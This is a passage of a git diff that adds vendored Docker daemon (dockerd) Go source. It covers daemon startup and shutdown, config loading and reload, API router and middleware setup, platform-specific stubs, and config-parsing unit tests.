+	logrus.WithFields(logrus.Fields{
+		"version":     dockerversion.Version,
+		"commit":      dockerversion.GitCommit,
+		"graphdriver": d.GraphDriverName(),
+	}).Info("Docker daemon")
+
+	cli.d = d
+
+	// initMiddlewares needs cli.d to be populated. Dont change this init order.
+	if err := cli.initMiddlewares(api, serverConfig); err != nil {
+		logrus.Fatalf("Error creating middlewares: %v", err)
+	}
+	d.SetCluster(c)
+	initRouter(api, d, c)
+
+	cli.setupConfigReloadTrap()
+
+	// The serve API routine never exits unless an error occurs
+	// We need to start it as a goroutine and wait on it so
+	// daemon doesn't exit
+	serveAPIWait := make(chan error)
+	go api.Wait(serveAPIWait)
+
+	// after the daemon is done setting up we can notify systemd api
+	notifySystem()
+
+	// Daemon is fully initialized and handling API traffic
+	// Wait for serve API to complete
+	errAPI := <-serveAPIWait
+	c.Cleanup()
+	shutdownDaemon(d)
+	containerdRemote.Cleanup()
+	if errAPI != nil {
+		return fmt.Errorf("Shutting down due to ServeAPI error: %v", errAPI)
+	}
+
+	return nil
+}
+
+func (cli *DaemonCli) reloadConfig() {
+	reload := func(config *daemon.Config) {
+
+		// Revalidate and reload the authorization plugins
+		if err := validateAuthzPlugins(config.AuthorizationPlugins, cli.d.PluginStore); err != nil {
+			logrus.Fatalf("Error validating authorization plugin: %v", err)
+			return
+		}
+		cli.authzMiddleware.SetPlugins(config.AuthorizationPlugins)
+
+		if err := cli.d.Reload(config); err != nil {
+			logrus.Errorf("Error reconfiguring the daemon: %v", err)
+			return
+		}
+
+		if config.IsValueSet("debug") {
+			debugEnabled := utils.IsDebugEnabled()
+			switch {
+			case debugEnabled && !config.Debug: // disable debug
+				utils.DisableDebug()
+				cli.api.DisableProfiler()
+			case config.Debug && !debugEnabled: // enable debug
+				utils.EnableDebug()
+				cli.api.EnableProfiler()
+			}
+
+		}
+	}
+
+	if err := daemon.ReloadConfiguration(*cli.configFile, cli.flags, reload); err != nil {
+		logrus.Error(err)
+	}
+}
+
+func (cli *DaemonCli) stop() {
+	cli.api.Close()
+}
+
+// shutdownDaemon just wraps daemon.Shutdown() to handle a timeout in case
+// d.Shutdown() is waiting too long to kill container or worst it's
+// blocked there
+func shutdownDaemon(d *daemon.Daemon) {
+	shutdownTimeout := d.ShutdownTimeout()
+	ch := make(chan struct{})
+	go func() {
+		d.Shutdown()
+		close(ch)
+	}()
+	if shutdownTimeout < 0 {
+		<-ch
+		logrus.Debug("Clean shutdown succeeded")
+		return
+	}
+	select {
+	case <-ch:
+		logrus.Debug("Clean shutdown succeeded")
+	case <-time.After(time.Duration(shutdownTimeout) * time.Second):
+		logrus.Error("Force shutdown daemon")
+	}
+}
+
+func loadDaemonCliConfig(opts daemonOptions) (*daemon.Config, error) {
+	config := opts.daemonConfig
+	flags := opts.flags
+	config.Debug = opts.common.Debug
+	config.Hosts = opts.common.Hosts
+	config.LogLevel = opts.common.LogLevel
+	config.TLS = opts.common.TLS
+	config.TLSVerify = opts.common.TLSVerify
+	config.CommonTLSOptions = daemon.CommonTLSOptions{}
+
+	if opts.common.TLSOptions != nil {
+		config.CommonTLSOptions.CAFile = opts.common.TLSOptions.CAFile
+		config.CommonTLSOptions.CertFile = opts.common.TLSOptions.CertFile
+		config.CommonTLSOptions.KeyFile = opts.common.TLSOptions.KeyFile
+	}
+
+	if opts.configFile != "" {
+		c, err := daemon.MergeDaemonConfigurations(config, flags, opts.configFile)
+		if err != nil {
+			if flags.Changed(flagDaemonConfigFile) || !os.IsNotExist(err) {
+				return nil, fmt.Errorf("unable to configure the Docker daemon with file %s: %v\n", opts.configFile, err)
+			}
+		}
+		// the merged configuration can be nil if the config file didn't exist.
+		// leave the current configuration as it is if when that happens.
+		if c != nil {
+			config = c
+		}
+	}
+
+	if err := daemon.ValidateConfiguration(config); err != nil {
+		return nil, err
+	}
+
+	// Labels of the docker engine used to allow multiple values associated with the same key.
+	// This is deprecated in 1.13, and, be removed after 3 release cycles.
+	// The following will check the conflict of labels, and report a warning for deprecation.
+	//
+	// TODO: After 3 release cycles (1.16) an error will be returned, and labels will be
+	// sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels):
+	//
+	// newLabels, err := daemon.GetConflictFreeLabels(config.Labels)
+	// if err != nil {
+	//	return nil, err
+	// }
+	// config.Labels = newLabels
+	//
+	if _, err := daemon.GetConflictFreeLabels(config.Labels); err != nil {
+		logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err)
+	}
+
+	// Regardless of whether the user sets it to true or false, if they
+	// specify TLSVerify at all then we need to turn on TLS
+	if config.IsValueSet(cliflags.FlagTLSVerify) {
+		config.TLS = true
+	}
+
+	// ensure that the log level is the one set after merging configurations
+	cliflags.SetLogLevel(config.LogLevel)
+
+	return config, nil
+}
+
+func initRouter(s *apiserver.Server, d *daemon.Daemon, c *cluster.Cluster) {
+	decoder := runconfig.ContainerDecoder{}
+
+	routers := []router.Router{
+		// we need to add the checkpoint router before the container router or the DELETE gets masked
+		checkpointrouter.NewRouter(d, decoder),
+		container.NewRouter(d, decoder),
+		image.NewRouter(d, decoder),
+		systemrouter.NewRouter(d, c),
+		volume.NewRouter(d),
+		build.NewRouter(dockerfile.NewBuildManager(d)),
+		swarmrouter.NewRouter(c),
+		pluginrouter.NewRouter(d.PluginManager()),
+	}
+
+	if d.NetworkControllerEnabled() {
+		routers = append(routers, network.NewRouter(d, c))
+	}
+
+	if d.HasExperimental() {
+		for _, r := range routers {
+			for _, route := range r.Routes() {
+				if experimental, ok := route.(router.ExperimentalRoute); ok {
+					experimental.Enable()
+				}
+			}
+		}
+	}
+
+	s.InitRouter(utils.IsDebugEnabled(), routers...)
+}
+
+func (cli *DaemonCli) initMiddlewares(s *apiserver.Server, cfg *apiserver.Config) error {
+	v := cfg.Version
+
+	exp := middleware.NewExperimentalMiddleware(cli.d.HasExperimental())
+	s.UseMiddleware(exp)
+
+	vm := middleware.NewVersionMiddleware(v, api.DefaultVersion, api.MinVersion)
+	s.UseMiddleware(vm)
+
+	if cfg.EnableCors {
+		c := middleware.NewCORSMiddleware(cfg.CorsHeaders)
+		s.UseMiddleware(c)
+	}
+
+	if err := validateAuthzPlugins(cli.Config.AuthorizationPlugins, cli.d.PluginStore); err != nil {
+		return fmt.Errorf("Error validating authorization plugin: %v", err)
+	}
+	cli.authzMiddleware = authorization.NewMiddleware(cli.Config.AuthorizationPlugins, cli.d.PluginStore)
+	s.UseMiddleware(cli.authzMiddleware)
+	return nil
+}
+
+// validates that the plugins requested with the --authorization-plugin flag are valid AuthzDriver
+// plugins present on the host and available to the daemon
+func validateAuthzPlugins(requestedPlugins []string, pg plugingetter.PluginGetter) error {
+	for _, reqPlugin := range requestedPlugins {
+		if _, err := pg.Get(reqPlugin, authorization.AuthZApiImplements, plugingetter.LOOKUP); err != nil {
+			return err
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go
new file mode 100644
index 0000000000..623aaf4b09
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go
@@ -0,0 +1,5 @@
+package main
+
+// notifySystem sends a message to the host when the server is ready to be used
+func notifySystem() {
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go
new file mode 100644
index 0000000000..a556daa187
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go
@@ -0,0 +1,11 @@
+// +build linux
+
+package main
+
+import systemdDaemon "github.com/coreos/go-systemd/daemon"
+
+// notifySystem sends a message to the host when the server is ready to be used
+func notifySystem() {
+	// Tell the init daemon we are accepting requests
+	go systemdDaemon.SdNotify("READY=1")
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go
new file mode 100644
index 0000000000..974ba16345
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go
@@ -0,0 +1,85 @@
+// +build solaris
+
+package main
+
+import (
+	"fmt"
+	"net"
+	"os"
+	"path/filepath"
+	"syscall"
+
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/system"
+)
+
+const defaultDaemonConfigFile = ""
+
+// currentUserIsOwner checks whether the current user is the owner of the given
+// file.
+func currentUserIsOwner(f string) bool {
+	if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil {
+		if int(fileInfo.UID()) == os.Getuid() {
+			return true
+		}
+	}
+	return false
+}
+
+// setDefaultUmask sets the umask to 0022 to avoid problems
+// caused by custom umask
+func setDefaultUmask() error {
+	desiredUmask := 0022
+	syscall.Umask(desiredUmask)
+	if umask := syscall.Umask(desiredUmask); umask != desiredUmask {
+		return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask)
+	}
+
+	return nil
+}
+
+func getDaemonConfDir(_ string) string {
+	return "/etc/docker"
+}
+
+// setupConfigReloadTrap configures the USR2 signal to reload the configuration.
+func (cli *DaemonCli) setupConfigReloadTrap() {
+}
+
+// notifySystem sends a message to the host when the server is ready to be used
+func notifySystem() {
+}
+
+func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption {
+	opts := []libcontainerd.RemoteOption{}
+	if cli.Config.ContainerdAddr != "" {
+		opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr))
+	} else {
+		opts = append(opts, libcontainerd.WithStartDaemon(true))
+	}
+	return opts
+}
+
+// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to
+// store their state.
+func (cli *DaemonCli) getLibcontainerdRoot() string {
+	return filepath.Join(cli.Config.ExecRoot, "libcontainerd")
+}
+
+// getSwarmRunRoot gets the root directory for swarm to store runtime state
+// For example, the control socket
+func (cli *DaemonCli) getSwarmRunRoot() string {
+	return filepath.Join(cli.Config.ExecRoot, "swarm")
+}
+
+func allocateDaemonPort(addr string) error {
+	return nil
+}
+
+// notifyShutdown is called after the daemon shuts down but before the process exits.
+func notifyShutdown(err error) {
+}
+
+func wrapListeners(proto string, ls []net.Listener) []net.Listener {
+	return ls
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go
new file mode 100644
index 0000000000..b364f87843
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go
@@ -0,0 +1,145 @@
+package main
+
+import (
+	"testing"
+
+	"github.com/Sirupsen/logrus"
+	cliflags "github.com/docker/docker/cli/flags"
+	"github.com/docker/docker/daemon"
+	"github.com/docker/docker/pkg/testutil/assert"
+	"github.com/docker/docker/pkg/testutil/tempfile"
+	"github.com/spf13/pflag"
+)
+
+func defaultOptions(configFile string) daemonOptions {
+	opts := daemonOptions{
+		daemonConfig: &daemon.Config{},
+		flags:        &pflag.FlagSet{},
+		common:       cliflags.NewCommonOptions(),
+	}
+	opts.common.InstallFlags(opts.flags)
+	opts.daemonConfig.InstallFlags(opts.flags)
+	opts.flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "")
+	opts.configFile = configFile
+	return opts
+}
+
+func TestLoadDaemonCliConfigWithoutOverriding(t *testing.T) {
+	opts := defaultOptions("")
+	opts.common.Debug = true
+
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	if !loadedConfig.Debug {
+		t.Fatalf("expected debug to be copied from the common flags, got false")
+	}
+}
+
+func TestLoadDaemonCliConfigWithTLS(t *testing.T) {
+	opts := defaultOptions("")
+	opts.common.TLSOptions.CAFile = "/tmp/ca.pem"
+	opts.common.TLS = true
+
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/tmp/ca.pem")
+}
+
+func TestLoadDaemonCliConfigWithConflicts(t *testing.T) {
+	tempFile := tempfile.NewTempFile(t, "config", `{"labels": ["l3=foo"]}`)
+	defer tempFile.Remove()
+	configFile := tempFile.Name()
+
+	opts := defaultOptions(configFile)
+	flags := opts.flags
+
+	assert.NilError(t, flags.Set(flagDaemonConfigFile, configFile))
+	assert.NilError(t, flags.Set("label", "l1=bar"))
+	assert.NilError(t, flags.Set("label", "l2=baz"))
+
+	_, err := loadDaemonCliConfig(opts)
+	assert.Error(t, err, "as a flag and in the configuration file: labels")
+}
+
+func TestLoadDaemonCliConfigWithTLSVerify(t *testing.T) {
+	tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": true}`)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	opts.common.TLSOptions.CAFile = "/tmp/ca.pem"
+
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	assert.Equal(t, loadedConfig.TLS, true)
+}
+
+func TestLoadDaemonCliConfigWithExplicitTLSVerifyFalse(t *testing.T) {
+	tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": false}`)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	opts.common.TLSOptions.CAFile = "/tmp/ca.pem"
+
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	assert.Equal(t, loadedConfig.TLS, true)
+}
+
+func TestLoadDaemonCliConfigWithoutTLSVerify(t *testing.T) {
+	tempFile := tempfile.NewTempFile(t, "config", `{}`)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	opts.common.TLSOptions.CAFile = "/tmp/ca.pem"
+
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	assert.Equal(t, loadedConfig.TLS, false)
+}
+
+func TestLoadDaemonCliConfigWithLogLevel(t *testing.T) {
+	tempFile := tempfile.NewTempFile(t, "config", `{"log-level": "warn"}`)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	assert.Equal(t, loadedConfig.LogLevel, "warn")
+	assert.Equal(t, logrus.GetLevel(), logrus.WarnLevel)
+}
+
+func TestLoadDaemonConfigWithEmbeddedOptions(t *testing.T) {
+	content := `{"tlscacert": "/etc/certs/ca.pem", "log-driver": "syslog"}`
+	tempFile := tempfile.NewTempFile(t, "config", content)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/etc/certs/ca.pem")
+	assert.Equal(t, loadedConfig.LogConfig.Type, "syslog")
+}
+
+func TestLoadDaemonConfigWithRegistryOptions(t *testing.T) {
+	content := `{
+		"registry-mirrors": ["https://mirrors.docker.com"],
+		"insecure-registries": ["https://insecure.docker.com"]
+	}`
+	tempFile := tempfile.NewTempFile(t, "config", content)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+
+	assert.Equal(t, len(loadedConfig.Mirrors), 1)
+	assert.Equal(t, len(loadedConfig.InsecureRegistries), 1)
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go
new file mode 100644
index 0000000000..bdce98bd26
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go
@@ -0,0 +1,137 @@
+// +build !windows,!solaris
+
+package main
+
+import (
+	"fmt"
+	"net"
+	"os"
+	"os/signal"
+	"path/filepath"
+	"strconv"
+	"syscall"
+
+	"github.com/docker/docker/cmd/dockerd/hack"
+	"github.com/docker/docker/daemon"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/libnetwork/portallocator"
+)
+
+const defaultDaemonConfigFile = "/etc/docker/daemon.json"
+
+// currentUserIsOwner checks whether the current user is the owner of the given
+// file.
+func currentUserIsOwner(f string) bool {
+	if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil {
+		if int(fileInfo.UID()) == os.Getuid() {
+			return true
+		}
+	}
+	return false
+}
+
+// setDefaultUmask sets the umask to 0022 to avoid problems
+// caused by custom umask
+func setDefaultUmask() error {
+	desiredUmask := 0022
+	syscall.Umask(desiredUmask)
+	if umask := syscall.Umask(desiredUmask); umask != desiredUmask {
+		return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask)
+	}
+
+	return nil
+}
+
+func getDaemonConfDir(_ string) string {
+	return "/etc/docker"
+}
+
+// setupConfigReloadTrap configures the USR2 signal to reload the configuration.
+func (cli *DaemonCli) setupConfigReloadTrap() {
+	c := make(chan os.Signal, 1)
+	signal.Notify(c, syscall.SIGHUP)
+	go func() {
+		for range c {
+			cli.reloadConfig()
+		}
+	}()
+}
+
+func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption {
+	opts := []libcontainerd.RemoteOption{
+		libcontainerd.WithDebugLog(cli.Config.Debug),
+		libcontainerd.WithOOMScore(cli.Config.OOMScoreAdjust),
+	}
+	if cli.Config.ContainerdAddr != "" {
+		opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr))
+	} else {
+		opts = append(opts, libcontainerd.WithStartDaemon(true))
+	}
+	if daemon.UsingSystemd(cli.Config) {
+		args := []string{"--systemd-cgroup=true"}
+		opts = append(opts, libcontainerd.WithRuntimeArgs(args))
+	}
+	if cli.Config.LiveRestoreEnabled {
+		opts = append(opts, libcontainerd.WithLiveRestore(true))
+	}
+	opts = append(opts, libcontainerd.WithRuntimePath(daemon.DefaultRuntimeBinary))
+	return opts
+}
+
+// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to
+// store their state.
+func (cli *DaemonCli) getLibcontainerdRoot() string {
+	return filepath.Join(cli.Config.ExecRoot, "libcontainerd")
+}
+
+// getSwarmRunRoot gets the root directory for swarm to store runtime state
+// For example, the control socket
+func (cli *DaemonCli) getSwarmRunRoot() string {
+	return filepath.Join(cli.Config.ExecRoot, "swarm")
+}
+
+// allocateDaemonPort ensures that there are no containers
+// that try to use any port allocated for the docker server.
+func allocateDaemonPort(addr string) error {
+	host, port, err := net.SplitHostPort(addr)
+	if err != nil {
+		return err
+	}
+
+	intPort, err := strconv.Atoi(port)
+	if err != nil {
+		return err
+	}
+
+	var hostIPs []net.IP
+	if parsedIP := net.ParseIP(host); parsedIP != nil {
+		hostIPs = append(hostIPs, parsedIP)
+	} else if hostIPs, err = net.LookupIP(host); err != nil {
+		return fmt.Errorf("failed to lookup %s address in host specification", host)
+	}
+
+	pa := portallocator.Get()
+	for _, hostIP := range hostIPs {
+		if _, err := pa.RequestPort(hostIP, "tcp", intPort); err != nil {
+			return fmt.Errorf("failed to allocate daemon listening port %d (err: %v)", intPort, err)
+		}
+	}
+	return nil
+}
+
+// notifyShutdown is called after the daemon shuts down but before the process exits.
+func notifyShutdown(err error) {
+}
+
+func wrapListeners(proto string, ls []net.Listener) []net.Listener {
+	switch proto {
+	case "unix":
+		ls[0] = &hack.MalformedHostHeaderOverride{ls[0]}
+	case "fd":
+		for i := range ls {
+			ls[i] = &hack.MalformedHostHeaderOverride{ls[i]}
+		}
+	}
+	return ls
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go
new file mode 100644
index 0000000000..d66dba77e1
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go
@@ -0,0 +1,114 @@
+// +build !windows,!solaris
+
+// TODO: Create new file for Solaris which tests config parameters
+// as described in daemon/config_solaris.go
+
+package main
+
+import (
+	"github.com/docker/docker/daemon"
+	"github.com/docker/docker/pkg/testutil/assert"
+	"github.com/docker/docker/pkg/testutil/tempfile"
+	"testing"
+)
+
+func TestLoadDaemonCliConfigWithDaemonFlags(t *testing.T) {
+	content := `{"log-opts": {"max-size": "1k"}}`
+	tempFile := tempfile.NewTempFile(t, "config", content)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	opts.common.Debug = true
+	opts.common.LogLevel = "info"
+	assert.NilError(t, opts.flags.Set("selinux-enabled", "true"))
+
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+
+	assert.Equal(t, loadedConfig.Debug, true)
+	assert.Equal(t, loadedConfig.LogLevel, "info")
+	assert.Equal(t, loadedConfig.EnableSelinuxSupport, true)
+	assert.Equal(t, loadedConfig.LogConfig.Type, "json-file")
+	assert.Equal(t, loadedConfig.LogConfig.Config["max-size"], "1k")
+}
+
+func TestLoadDaemonConfigWithNetwork(t *testing.T) {
+	content := `{"bip": "127.0.0.2", "ip": "127.0.0.1"}`
+	tempFile := tempfile.NewTempFile(t, "config", content)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+
+	assert.Equal(t, loadedConfig.IP, "127.0.0.2")
+	assert.Equal(t, loadedConfig.DefaultIP.String(), "127.0.0.1")
+}
+
+func TestLoadDaemonConfigWithMapOptions(t *testing.T) {
+	content := `{
+		"cluster-store-opts": {"kv.cacertfile": "/var/lib/docker/discovery_certs/ca.pem"},
+		"log-opts": {"tag": "test"}
+}`
+	tempFile := tempfile.NewTempFile(t, "config", content)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	assert.NotNil(t, loadedConfig.ClusterOpts)
+
+	expectedPath := "/var/lib/docker/discovery_certs/ca.pem"
+	assert.Equal(t, loadedConfig.ClusterOpts["kv.cacertfile"], expectedPath)
+	assert.NotNil(t, loadedConfig.LogConfig.Config)
+	assert.Equal(t, loadedConfig.LogConfig.Config["tag"], "test")
+}
+
+func TestLoadDaemonConfigWithTrueDefaultValues(t *testing.T) {
+	content := `{ "userland-proxy": false }`
+	tempFile := tempfile.NewTempFile(t, "config", content)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	assert.NotNil(t, loadedConfig.ClusterOpts)
+
+	assert.Equal(t, loadedConfig.EnableUserlandProxy, false)
+
+	// make sure reloading doesn't generate configuration
+	// conflicts after normalizing boolean values.
+	reload := func(reloadedConfig *daemon.Config) {
+		assert.Equal(t, reloadedConfig.EnableUserlandProxy, false)
+	}
+	assert.NilError(t, daemon.ReloadConfiguration(opts.configFile, opts.flags, reload))
+}
+
+func TestLoadDaemonConfigWithTrueDefaultValuesLeaveDefaults(t *testing.T) {
+	tempFile := tempfile.NewTempFile(t, "config", `{}`)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	assert.NotNil(t, loadedConfig.ClusterOpts)
+
+	assert.Equal(t, loadedConfig.EnableUserlandProxy, true)
+}
+
+func TestLoadDaemonConfigWithLegacyRegistryOptions(t *testing.T) {
+	content := `{"disable-legacy-registry": true}`
+	tempFile := tempfile.NewTempFile(t, "config", content)
+	defer tempFile.Remove()
+
+	opts := defaultOptions(tempFile.Name())
+	loadedConfig, err := loadDaemonCliConfig(opts)
+	assert.NilError(t, err)
+	assert.NotNil(t, loadedConfig)
+	assert.Equal(t, loadedConfig.V2Only, true)
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go
new file mode 100644
index 0000000000..4cccd32688
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go
@@ -0,0 +1,92 @@
+package main
+
+import (
+	"fmt"
+	"net"
+	"os"
+	"path/filepath"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/system"
+)
+
+var defaultDaemonConfigFile = ""
+
+// currentUserIsOwner checks whether the current user is the owner of the given
+// file.
+func currentUserIsOwner(f string) bool {
+	return false
+}
+
+// setDefaultUmask doesn't do anything on windows
+func setDefaultUmask() error {
+	return nil
+}
+
+func getDaemonConfDir(root string) string {
+	return filepath.Join(root, `\config`)
+}
+
+// notifySystem sends a message to the host when the server is ready to be used
+func notifySystem() {
+	if service != nil {
+		err := service.started()
+		if err != nil {
+			logrus.Fatal(err)
+		}
+	}
+}
+
+// notifyShutdown is called after the daemon shuts down but before the process exits.
+func notifyShutdown(err error) {
+	if service != nil {
+		if err != nil {
+			logrus.Fatal(err)
+		}
+		service.stopped(err)
+	}
+}
+
+// setupConfigReloadTrap configures a Win32 event to reload the configuration.
+func (cli *DaemonCli) setupConfigReloadTrap() {
+	go func() {
+		sa := syscall.SecurityAttributes{
+			Length: 0,
+		}
+		ev := "Global\\docker-daemon-config-" + fmt.Sprint(os.Getpid())
+		if h, _ := system.CreateEvent(&sa, false, false, ev); h != 0 {
+			logrus.Debugf("Config reload - waiting signal at %s", ev)
+			for {
+				syscall.WaitForSingleObject(h, syscall.INFINITE)
+				cli.reloadConfig()
+			}
+		}
+	}()
+}
+
+func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption {
+	return nil
+}
+
+// getLibcontainerdRoot gets the root directory for libcontainerd to store its
+// state. The Windows libcontainerd implementation does not need to write a spec
+// or state to disk, so this is a no-op.
+func (cli *DaemonCli) getLibcontainerdRoot() string {
+	return ""
+}
+
+// getSwarmRunRoot gets the root directory for swarm to store runtime state
+// For example, the control socket
+func (cli *DaemonCli) getSwarmRunRoot() string {
+	return ""
+}
+
+func allocateDaemonPort(addr string) error {
+	return nil
+}
+
+func wrapListeners(proto string, ls []net.Listener) []net.Listener {
+	return ls
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker.go b/vendor/github.com/docker/docker/cmd/dockerd/docker.go
new file mode 100644
index 0000000000..60742ae927
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/docker.go
@@ -0,0 +1,110 @@
+package main
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"runtime"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/cli"
+	cliflags "github.com/docker/docker/cli/flags"
+	"github.com/docker/docker/daemon"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/pkg/reexec"
+	"github.com/docker/docker/pkg/term"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+)
+
+type daemonOptions struct {
+	version      bool
+	configFile   string
+	daemonConfig *daemon.Config
+	common       *cliflags.CommonOptions
+	flags        *pflag.FlagSet
+}
+
+func newDaemonCommand() *cobra.Command {
+	opts := daemonOptions{
+		daemonConfig: daemon.NewConfig(),
+		common:       cliflags.NewCommonOptions(),
+	}
+
+	cmd := &cobra.Command{
+		Use:           "dockerd [OPTIONS]",
+		Short:         "A self-sufficient runtime for containers.",
+		SilenceUsage:  true,
+		SilenceErrors: true,
+		Args:          cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.flags = cmd.Flags()
+			return runDaemon(opts)
+		},
+	}
+	cli.SetupRootCommand(cmd)
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.version, "version", "v", false, "Print version information and quit")
+	flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "Daemon configuration file")
+	opts.common.InstallFlags(flags)
+	opts.daemonConfig.InstallFlags(flags)
+	installServiceFlags(flags)
+
+	return cmd
+}
+
+func runDaemon(opts daemonOptions) error {
+	if opts.version {
+		showVersion()
+		return nil
+	}
+
+	daemonCli := NewDaemonCli()
+
+	// Windows specific settings as these are not defaulted.
+	if runtime.GOOS == "windows" {
+		if opts.daemonConfig.Pidfile == "" {
+			opts.daemonConfig.Pidfile = filepath.Join(opts.daemonConfig.Root, "docker.pid")
+		}
+		if opts.configFile == "" {
+			opts.configFile = filepath.Join(opts.daemonConfig.Root, `config\daemon.json`)
+		}
+	}
+
+	// On Windows, this may be launching as a service or with an option to
+	// register the service.
+	stop, err := initService(daemonCli)
+	if err != nil {
+		logrus.Fatal(err)
+	}
+
+	if stop {
+		return nil
+	}
+
+	err = daemonCli.start(opts)
+	notifyShutdown(err)
+	return err
+}
+
+func showVersion() {
+	fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit)
+}
+
+func main() {
+	if reexec.Init() {
+		return
+	}
+
+	// Set terminal emulation based on platform as required.
+	_, stdout, stderr := term.StdStreams()
+	logrus.SetOutput(stderr)
+
+	cmd := newDaemonCommand()
+	cmd.SetOutput(stdout)
+	if err := cmd.Execute(); err != nil {
+		fmt.Fprintf(stderr, "%s\n", err)
+		os.Exit(1)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go
new file mode 100644
index 0000000000..19c5587cb6
--- /dev/null
